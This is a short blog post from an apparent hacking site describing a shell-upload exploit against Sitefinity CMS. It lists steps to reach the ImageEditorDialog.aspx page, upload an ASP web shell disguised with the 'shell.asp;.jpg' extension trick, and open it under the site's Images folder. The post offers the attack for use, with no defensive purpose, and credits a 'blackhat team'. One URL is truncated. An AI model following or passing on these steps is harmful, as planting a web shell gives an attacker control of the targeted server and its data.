Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

Posted in Wednesday, 27 July 2011
by Saadi

exploit # /UserControls/Dialogs/ImageEditorDialog.aspx

first go to # http://site.com/sitefinity/

then # http://site.com/sitefinity/UserContr...torDialog.aspx

select # asp renamed via the .asp;.jpg (shell.asp;.jpg)

Upload to # http://site.com/Images/[shell]


credit goes to blackhat team !!

0 comments:

Pages

Powered by Blogger.
Copyright 2010 @ Hacking Pro